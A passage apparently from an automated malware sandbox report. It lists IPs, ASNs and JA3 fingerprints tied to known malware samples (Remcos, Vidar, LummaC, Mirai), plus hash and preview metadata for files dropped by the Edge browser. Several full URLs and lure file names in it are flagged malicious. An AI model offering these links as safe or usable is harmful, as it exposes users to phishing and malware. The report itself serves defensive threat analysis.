                                                                                                                                                                                                                                                                            • 172.64.41.3
                                                                                                                                                                                                                                                                            17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                            • 172.64.41.3
                                                                                                                                                                                                                                                                            Tax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                            • 162.159.61.3
                                                                                                                                                                                                                                                                            Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 172.64.41.3
                                                                                                                                                                                                                                                                            Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 162.159.61.3
                                                                                                                                                                                                                                                                            random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 162.159.61.3
                                                                                                                                                                                                                                                                            random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 172.64.41.3
                                                                                                                                                                                                                                                                            ssl.bingadsedgeextension-prod-europe.azurewebsites.netMansourbank Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                                                            17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                                                            random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                                                            over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                                                            6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                                                            Bp4LoSXw83.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                                                            BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                                                            Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                                                            JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                            • 94.245.104.56
                                                                                                                                                                                                                                                                            aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                            • 94.245.104.56

                                                                                                                                                                                                                                                                            ASNs

                                                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                            AKAMAI-ASN1EUMansourbank Swift-TT379733 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                                                                                                                                            • 23.44.201.31
                                                                                                                                                                                                                                                                            Mansourbank Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                                                                                                                                            • 23.209.72.40
                                                                                                                                                                                                                                                                            w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 23.44.136.141
                                                                                                                                                                                                                                                                            http://click.pstmrk.itGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 2.16.164.35
                                                                                                                                                                                                                                                                            https://www.scribd.com/document/787929982/script-tlsfranceGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 95.100.110.93
                                                                                                                                                                                                                                                                            momo.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                            • 104.64.44.18
                                                                                                                                                                                                                                                                            z0r0.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                            • 204.237.205.107
                                                                                                                                                                                                                                                                            17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                            • 104.117.182.56
                                                                                                                                                                                                                                                                            random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 23.209.72.41
                                                                                                                                                                                                                                                                            https://track2.mccarthysearch.com/9155296/c?p=UJEwZLRSuPVlnD1ICTWZusB5H46ZFxhQFeZmgv_N89FzkqdhuHSGoPyB5qZfahmny00oVnRJ_XGR4M89Ovy-j3JZN_nz1Nb-BfHfDXVFwrd4A8njKtxWHgVV9KpuZ3ad6Xn31h13Ok4dSqgAUkhmVH1KUMKOlrKi5AYGmafMXkrBRxU_B4vy7NXVbEVJ970TwM25LbuS_B0xuuC5g8ehQDyYNyEV1WCghuhx_ZKmrGeOOXDf8HkQ-KOwv_tecp8TMdskXzay5lvoS31gB-nWxsjPaZ8f84KWvabQB4eF73ffpyNcTpJues_4IHHPjEKJ9ritMRTaHbFdQGNT_n13X_E7no0nMmaegQjwo4kKGu6oR02iG2c_6ucy3I6d8vsNl324Pjhx3M20dDmfZAju1roW9lGyO1LfgEnp1iSAFpx4kA7frEmKGzJYNX_cZrwVBoH8vvIYauXGnXBrZacRhuZGGbOjW2HHr9KF-0q7xjdgG2hxjWZ2H9zjubJGDnUjHRfiIr_-0bem1pLFqziEmy0450LGuXV23cQ6GD8yuK9tuRwMIF0sbkhVqONC0e6TsXlkUuTRAVWBbLlRPcygJ-CbukwvFtAxobVQ8-PpIuGj97DYFnmbfbJrrZDtH57TpdP4AxtW5k74BKSXvb1B6JX0p7Oyr1kXxLs_OrNPdAdrf8gXR35D9W7WeQ2zhPEqP0Mv5sJx4DlYh6Y4FqgPfCRFcDcL7Cy3HSlJ0XYfv-ae4o-hdX_0rJPqEG_-Bn2yj60YPDYpE8KDIgC_ZMwlNLdK4pAK6vSt4NWDncuV5y7QDqt97ribjd4U3AOvQTKW9r_eMky9-IC9hkSPrg2S0ZBgA9ITW3AQ3v-lq94cAwt1v1RLaFgsy67l_7lni1gYsZaQdOsFJsDpCFYaZsTMcVz2QAnQ_2UidhzlUekPl5xh9LNe9o77rO1FolZslooaXxCf2U2RZmvUA6NCNiGZ8KSsoUYTnqAHenvBJVJwMWd66yD2O60rC3Ic2qOQ1KOF9AB6-iFTvQFxtSTjS2hFwi7N97LeQtVYKhdzZuq2SasgJg0JPnZiFv_FSbgmiodqx9rz_lWIqWQNoQVht-oO2BfFxSF_aedAmm2MuQAL7z8UjBf_deiKwQyfKOyA6ZkAJ14F9xwhNm9F7B4PBgDtocqJQBjw5Cf1jCBSAs3nSYP2_nzofJuQSXd-YD9PIzkkmJw7Nqux7IgJ6p1z2Hsf6i3zShVdZY3g2mmA1xR1FV1LoSYwcRBqZt3pv0UDjuqCEoiqKDuyT0rkhqTRLo29uuM588Lna16PFSgSLoLUhnJ2rx8NLQQc5TqrsGjlN-ulCwTEyA0C9Epz9mxq14yDjw==Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 2.16.168.12
                                                                                                                                                                                                                                                                            MIT-GATEWAYSUSSales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 18.173.205.117
                                                                                                                                                                                                                                                                            https://docs.google.com/presentation/d/e/2PACX-1vT2PGn0zBbaptqxmzd37o4wD_789vdOk0IyvB9NJB93qGFh_af8Du5RuZX0G1lsycIP1UzhONEj31sn/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 18.66.122.120
                                                                                                                                                                                                                                                                            https://d3sdeiz39xdvhy.cloudfront.netGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 18.66.102.106
                                                                                                                                                                                                                                                                            Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 18.66.112.27
                                                                                                                                                                                                                                                                            1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 18.66.112.128
                                                                                                                                                                                                                                                                            1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 18.66.112.109
                                                                                                                                                                                                                                                                            miori.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 18.43.155.129
                                                                                                                                                                                                                                                                            https://u896278.ct.sendgrid.net/ls/click?upn=u001.qpi-2F0q-2FpcJZ7AGoG9N-2BrxLxoGn8scq-2BedBfmGHFAiwRCk-2Fciku7nsS3YfQMNNJI09mLo_nYx4-2F6dkZkjW10KMIp5mXhxys1ng1sBiI-2Bi9ROMYt6d5xhIh5rIqEUIaIxVHh8-2Ftz-2FouCgfXZk6mMUe2uKm92SOgBLlBdhjnRJuhENZnIuGoEoPqnROi7OCzdabJBBnGjEwd2iK-2BngR2RyIIgM3XrJQ7wQhHrfqScifSW3iAsv3H5nGFK9ntcSdChvkxj0yXdE-2FQ0ICDszl57i6aZSB-2Fow-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 18.66.102.79
                                                                                                                                                                                                                                                                            https://report-scam.malwarebouncer.com/XcUR2TnV2VTlXT0s0Z0NYa01KSGt3dUtWMWNiblBrc29mMlpZUU1WdThBSjdDdTlRQTVDV1ZZd0pDeWRmUU5rQ1QvVDNiSlBNYWd2bTd0eTRkZW5jT0hrYTBKWHFiVUc4TVZBOGpiNkh4VG9OTm9zNTVUWHNmNWVydHpqbzhIc1llSzdzTHZ0dENVNWRLZy9BbCsyVDRMSGRHOThUWnV5QUxPU0RZL1dPalNYTmUzMTVoRzl5bmk1ZVZRPT0tLUdVYnJkMC9GazI3MWlxYmotLUpFOURyOWkzK1l6Vy9BYTVOVDBVNkE9PQ==?cid=2346401253Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                                                                                            • 18.173.205.50
                                                                                                                                                                                                                                                                            sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                            • 19.44.195.99
                                                                                                                                                                                                                                                                            AKAMAI-ASUSBnJxmraqlk.exeGet hashmaliciousLummaC, PrivateLoaderBrowse
                                                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                                                            file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 184.28.90.27
                                                                                                                                                                                                                                                                            Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 23.45.0.233
                                                                                                                                                                                                                                                                            NjFiIQNSid.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                                                                                            w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 23.49.251.7
                                                                                                                                                                                                                                                                            w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 23.57.90.149
                                                                                                                                                                                                                                                                            malware.batGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                            • 184.28.90.27
                                                                                                                                                                                                                                                                            https://www.scribd.com/document/787929982/script-tlsfranceGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 104.102.34.86
                                                                                                                                                                                                                                                                            Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 23.44.181.15
                                                                                                                                                                                                                                                                            Fantazy.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 95.101.191.171
                                                                                                                                                                                                                                                                            MICROSOFT-CORP-MSN-AS-BLOCKUSfile_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 52.113.194.132
                                                                                                                                                                                                                                                                            Mansourbank Swift-TT379733 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                                                                                                                                            • 204.79.197.203
                                                                                                                                                                                                                                                                            Mansourbank Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                                                                                                                                                            • 204.79.197.203
                                                                                                                                                                                                                                                                            Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 40.76.134.238
                                                                                                                                                                                                                                                                            https://147y3.trk.elasticemail.com/tracking/click?d=l6DX1ZxoYxoIu3Ps_nHCw2dpTGYsp50KhPgdcLAPZ98lDQqXluI2jbk2Kz6cWaRjWchw5Igbhe-BSjXhcIk5khB6_31XWJ3KxF070e3rxxM9hJmShBhAM7tP0jesqnjYkgFpEuivEIV6QQKt0-F18YQ1#out/0023m/435/85jy1/26p0/41/77Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 52.191.212.24
                                                                                                                                                                                                                                                                            Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 20.13.96.71
                                                                                                                                                                                                                                                                            miori.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 22.35.211.83
                                                                                                                                                                                                                                                                            x86_64.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                            • 51.111.190.47
                                                                                                                                                                                                                                                                            i686.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                            • 65.52.116.212
                                                                                                                                                                                                                                                                            i486.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                            • 20.156.150.63

                                                                                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                            a0e9f5d64349fb13191bc781f81f42e164pOGv7k4N.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                                                                                            BnJxmraqlk.exeGet hashmaliciousLummaC, PrivateLoaderBrowse
                                                                                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                                                                                            NjFiIQNSid.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                                                                                            H565rymIuO.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                                                                                            w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                                                                                            w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                                                                                            sEG2xXpg0X.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                                                                                            Drivespan.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                                                                                            installer_1.05_36.8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                                                                                            setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                            • 188.114.97.3

                                                                                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exew3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                              w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                9mauyKC3JW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  ATLEQQXO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    ATLEQQXO.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                      upgrade.htaGet hashmaliciousDarkVision RatBrowse
                                                                                                                                                                                                                                                                                        MiJZ3z4t5K.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                          UolJwovI8c.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                            ONHQNHFT.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                              es.htaGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\311b21a3-6c74-48f5-9690-eae24eae0d3f.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44707
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.095146489362549
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kWuKKGf4yUSqXKVjVqA6N7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynUHOtN7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                MD5:19B3BE8C0FCB8750AD384ABF59ECDD6B
                                                                                                                                                                                                                                                                                                SHA1:024F98A7741EE7953C6F604C3C48E85264F96AF7
                                                                                                                                                                                                                                                                                                SHA-256:282A713DEB0E4EC3F09217C4CBD6698F0009893F67178F56D1F6A2D1C9D9E453
                                                                                                                                                                                                                                                                                                SHA-512:1D508001D62BA7CEB98675E2E67D0D1C53AC7497147203E473DF878463DAC9E71CDC77D2863CA384650429757FB518FEA93B3167A07864E88A4E7469C1353E9E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4b35c245-b8f5-4893-8253-b6285058f4fc.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):44769
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.095008368043801
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xSauKKGf4yUSqXE8j3pz2N7DRo+yM/42cRaLMoskCiG:z/Ps+wsI7yOZHOaN7VLyMV/YoskFoz
                                                                                                                                                                                                                                                                                                MD5:F0CB315573E513ABF90C2910ABCE8562
                                                                                                                                                                                                                                                                                                SHA1:33E7DB515B7793AC1F8A4D3909204204B85B5354
                                                                                                                                                                                                                                                                                                SHA-256:143212C62EAB4F83C2AC0112F57FF431D619EEABFCFF46CE22F660429507A042
                                                                                                                                                                                                                                                                                                SHA-512:E1B81317D38CC8AF2ACAC832EF4BE77FACD68308E2E5FD7B3A53035C8197CB3415763DF44725BA6C6195EAA6EE3AE76813D77695836D37EB83B12F345AE3B087
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\7ee74dc5-30fb-4d64-8740-596aa2573fb0.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):46136
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.087123307204402
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:uMkbJrT8IeQc5Oa7TbKKGf4yUSqXg8j3pz2HXcQSfMCiop7DRo+yM/42cRaLMosa:uMk1rT8H2agHOWH9Fop7VLyMV/Yosa
                                                                                                                                                                                                                                                                                                MD5:51D7BAD2ED56E30EFA78420C6A7B5E06
                                                                                                                                                                                                                                                                                                SHA1:137FBB8BF70A052DDC804952AE694BCC1CC08FA2
                                                                                                                                                                                                                                                                                                SHA-256:397CFB05D88801278D4A04B03A473D0D93CBED958160A0F0826C9EE04EAC4AED
                                                                                                                                                                                                                                                                                                SHA-512:95547830AF9FEF2489D789D32759F53360908268E6AA1E4AC0C8CC53801AF1EDD507D052ADDE88189ADF8021B82672E368567B9437D4F9658E698D9732C67784
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"5506496d-86e7-4800-8e39-8350f755112f"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736252348"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\8d3f385f-7d0a-43a5-9c4c-3d48d868e0bd.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):46059
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.087250121808617
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:uMkbJrT8IeQc5da7TbKKGf4yUSqXE8j3pz2HXcQSfMCiop7DRo+yM/42cRaLMosa:uMk1rT8H1agHOaH9Fop7VLyMV/Yosa
                                                                                                                                                                                                                                                                                                MD5:35E9DD4647CD6DCE1B76A32072AFED62
                                                                                                                                                                                                                                                                                                SHA1:8AF66D49D7AC99D4F08A3A0C6AAD7097BBB680B9
                                                                                                                                                                                                                                                                                                SHA-256:7F50CB7BC90265D1A98872F64E1A84F3B35B519B05296594DBBAFB117DFEE02F
                                                                                                                                                                                                                                                                                                SHA-512:7DFD049E35EE31EB7D7673FA4C16970B8CD833E6863553A8A5BD21BDF839799298A9A607DC305E675518C3259182AEFEFE673577135D9A01252E6A80904B2DB4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"5506496d-86e7-4800-8e39-8350f755112f"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736252348"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMs

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\a3d3fe8e-7623-4538-94e4-a312781c6937.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):107893
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.640173185101434
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
                                                                                                                                                                                                                                                                                                MD5:68DDA50FDB9AF6E86F170412111C6190
                                                                                                                                                                                                                                                                                                SHA1:B3171ED37DBCB85AA186B62063672E4E3A218DFE
                                                                                                                                                                                                                                                                                                SHA-256:56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
                                                                                                                                                                                                                                                                                                SHA-512:71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
                                                                                                                                                                                                                                                                                                Malicious:false
